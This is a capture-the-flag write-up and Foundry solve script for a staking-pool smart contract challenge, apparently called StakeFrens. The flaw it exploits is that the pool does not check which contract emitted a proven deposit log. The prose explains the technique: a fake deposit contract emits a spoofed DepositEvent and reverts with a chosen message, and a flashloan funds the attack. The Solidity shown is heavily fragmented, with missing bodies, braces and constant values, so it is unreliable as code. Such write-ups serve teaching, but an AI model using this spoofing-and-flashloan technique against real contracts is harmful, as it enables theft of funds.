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219 lines (189 loc) · 8.68 KB
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This challenge is roughly based on an idea to use proofs of log emissions (using e.g. Relic Protocol) from the ETH2 deposit contract to build a simple staking pool contract. The idea has a few flaws, but the implementation used in this challenge has a major flaw: the address which emitted the log is not validated to equal the deposit contract. As a result, an attacker can create a contract which emits a DepositEvent without actually requiring an ETH2 deposit.

To simplify the challenge and enable an atomic solution, the goal of the challenge is simply to convince a wrapper contract that the "deposit contract" reverted due to an impossible failure (ETH deposited is greater than $2^{64}$ gwei). Instead, the attacker's fake deposit contract can be writted to revert with this same message. This highlights that revert messages should almost never be used to infer an actual failure reason.

Solving the puzzle

The attacker creates a contract which emits a fake DepositEvent matching the validation logic for some FrenPool. The get_deposit_root() method of this contract should be written to revert with the required message.

Once the crafted event is included on chain, the Relic SDK can be used to fetch a proof of this log emission, which can be passed to the FrenPool to perform the attack.

If the attack is performed correctly, 16 ETH is required to be passed to the contract, but it will all be returned to the attacker. As a result, a zero-fee flashloan can be used to perform this attack with minimal ETH requirements.

Solve script

Check out our solve script below or on GitHub for more details.

**Note**: To simplify testing, our solve script includes some Foundry hacks for mocking out the Relic proofs. When performing the attack on-chain, these portions must be done in separate transactions using an actual proof constructed for Relic Protocol.
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import {Test, console2} from "forge-std/Test.sol";
import {IReliquary} from "relic-sdk/packages/contracts/interfaces/IReliquary.sol";
import {IProver} from "relic-sdk/packages/contracts/interfaces/IProver.sol";
import {Fact, FactSignature} from "relic-sdk/packages/contracts/lib/Facts.sol";
import {FactSigs} from "relic-sdk/packages/contracts/lib/FactSigs.sol";
import {CoreTypes} from "relic-sdk/packages/contracts/lib/CoreTypes.sol";
import {IDepositEvents, IDepositContract} from "../src/interfaces/IDepositContract.sol";
import {FrenPool} from "../src/FrenPool.sol";
import {StakeFrens} from "../src/StakeFrens.sol";
import {FrenCoin} from "../src/FrenCoin.sol";
import {RelicMock} from "./RelicMock.sol";
import {ETHFlashloan} from "./ETHFlashloan.sol";

contract FakeDepositContract is IDepositContract {
    function makeFakeDeposit(
        bytes calldata pubkey,
        bytes calldata withdrawal_credentials,
        bytes calldata amount,
        bytes calldata signature,
        bytes calldata index
    ) external {
        emit DepositEvent(

    function deposit(
        bytes calldata ,
        bytes calldata ,
        bytes calldata ,
    ) external payable {

    function get_deposit_count() external pure returns (bytes memory) {

    function get_deposit_root() external pure returns (bytes32) {
        revert("DepositContract: deposit value too high");

contract Solver is ETHFlashloan {
    function callback(bytes calldata data) internal override {
            FrenCoin coin,
            address creator,
            address prover,
            FrenPool.DepositProof memory proof
        ) = abi.decode(
                (FrenCoin, address, address, FrenPool.DepositProof)
        coin.showFrenship{value: 16 ether}(creator, prover, proof);

    function solve(
        FrenCoin coin,
        address creator,
        address prover,
        FrenPool.DepositProof calldata proof
    ) external payable {
        assert(msg.value == FLASHLOAN_FEE);
        flashLoan(16 ether, abi.encode(coin, creator, prover, proof));
        coin.transfer(msg.sender, coin.balanceOf(address(this)));

contract Solve is RelicMock, Test, IDepositEvents {
    IReliquary constant RELIQUARY =
    address constant RELIC_MULTISIG =
    address constant RELIC_LOG_PROVER =

    StakeFrens stakeFrens;
    FrenCoin frenCoin;

    constructor() RelicMock(RELIQUARY, RELIC_MULTISIG) {}

    function setup() public {
        stakeFrens = new StakeFrens();
        frenCoin = stakeFrens.frenCoin();

    function to_little_endian_64(
        uint64 value
    ) internal pure returns (bytes memory ret) {
        ret = new bytes(8);
        bytes8 bytesValue = bytes8(value);
        // Byteswapping during copying to bytes.
        ret[0] = bytesValue[7];
        ret[1] = bytesValue[6];
        ret[2] = bytesValue[5];
        ret[3] = bytesValue[4];
        ret[4] = bytesValue[3];
        ret[5] = bytesValue[2];
        ret[6] = bytesValue[1];
        ret[7] = bytesValue[0];

    function setupMockProof(
        FakeDepositContract fake
    ) internal returns (FrenPool.DepositProof memory proof) {
        bytes32[] memory topics = new bytes32[](1);
        topics[0] = DepositEvent.selector;
        bytes memory pubkey = new bytes(48);
        bytes memory withdrawal_credentials = stakeFrens.pools(address(this)).eth1WithdrawalCredentials();
        uint256 deposit_amount = 16 ether;
        DepositEventData memory deposit = DepositEventData(
            to_little_endian_64(uint64(deposit_amount / 1 gwei)),
            new bytes(96),
        CoreTypes.LogData memory log = CoreTypes.LogData(
        bytes memory data = abi.encode(log);
        FactSignature sig = FactSigs.logFactSig(0, 0, 0);
        Fact memory fact = Fact(address(fake), sig, data);
        proof = FrenPool.DepositProof(0, 0, 0, bytes32(0), mockProof(fact));

    function getMockProverAndProof(
        FakeDepositContract fake
    ) internal returns (address prover, FrenPool.DepositProof memory proof) {
        prover = setupMockProver();
        proof = setupMockProof(fake);

    function getRealProverAndProof(
        FakeDepositContract fake
    ) internal returns (address prover, FrenPool.DepositProof memory proof) {
        prover = RELIC_LOG_PROVER;

        bytes memory pubkey = new bytes(48);
        bytes memory withdrawal_credentials = stakeFrens.pools(address(this)).eth1WithdrawalCredentials();
        uint256 deposit_amount = 16 ether;

        // we should broadcast this
            to_little_endian_64(uint64(deposit_amount / 1 gwei)),
            new bytes(96),
        // TODO: fetch relic proof and finish attack

    function solve() internal {
        FakeDepositContract fake = new FakeDepositContract();
            address prover,
            FrenPool.DepositProof memory proof
        ) = getMockProverAndProof(fake);
        Solver solver = new Solver();
        solver.solve{value: solver.FLASHLOAN_FEE()}(frenCoin, address(this), prover, proof);
        uint256 seed = stakeFrens.generate(address(this));
        uint256 amount = uint256(uint128(uint256(keccak256(abi.encode(seed)))));
        uint256 balance = frenCoin.balanceOf(address(this));
        require(balance > amount, "amount too small");
        frenCoin.transfer(address(1), balance - amount);
        require(stakeFrens.verify(seed, amount), "challenge not solved");

    function test() public {